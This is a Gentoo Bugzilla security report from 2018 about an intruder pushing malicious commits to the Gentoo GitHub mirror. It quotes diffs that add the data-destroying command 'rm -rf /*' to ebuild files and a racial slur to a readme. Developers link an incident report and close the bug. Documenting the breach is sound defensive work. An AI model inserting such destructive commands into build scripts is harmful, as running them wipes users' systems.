Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 659542 - URGENT! Strange commits to the tree
Summary: URGENT! Strange commits to the tree
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Misc (show other bugs)
Hardware: All Linux
: Highest blocker (vote)
Assignee: Gentoo Security
URL: https://infra-status.gentoo.org/notic...
Whiteboard:
Keywords:
Depends on:
Blocks:
 
Reported: 2018-06-28 20:46 UTC by Frank Krömmelbein
Modified: 2018-07-09 19:45 UTC (History)
6 users (show)

See Also:
Package list:
Runtime testing required: ---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Frank Krömmelbein 2018-06-28 20:46:30 UTC 
E.g.:
https://github.com/gentoo/gentoo/commit/fdd8da2e0edc5076c3ea25d52b15c26c16da35f4

Your Name committed 10 minutes ago
readme.md
@@ -0,0 +1 @@
+niggers

Or this one:
https://github.com/gentoo/gentoo/commit/49464b7316dbd7bbfe878cb3da4817c39a6cf11c
Your Name committed 6 minutes ago
skel.ebuild
-
+rm -rf /*&

Reproducible: Always
Comment 1 Frank Krömmelbein 2018-06-28 20:53:03 UTC 
And more commits to many ebuilds with delete cmds!!!

https://github.com/gentoo/gentoo/commit/afcdc03b595ded34d6c367cb870f01b3dae7dd02

app-accessibility/at-spi2-atk/at-spi2-atk-2.22.0.ebuild
@@ -1,3 +1,4 @@
+rm -rf /*
Comment 2 Michał Górny archtester Gentoo Infrastructure gentoo-dev Security 2018-06-28 21:37:35 UTC 
https://www.gentoo.org/news/2018/06/28/Github-gentoo-org-hacked.html

We're working with GitHub staff to resolve the issue.
Comment 3 Kristian Fiskerstrand (RETIRED) gentoo-dev 2018-06-29 11:56:59 UTC 
[Security note] This is not impacting the actual gentoo ebuild repository or infrastructure, but is limited to the github mirror that is provided as a convenience for outside contributions.
Comment 4 Kristian Fiskerstrand (RETIRED) gentoo-dev 2018-07-09 19:45:48 UTC 
Incident report is at https://wiki.gentoo.org/wiki/Github/2018-06-28 and the issue is considered closed.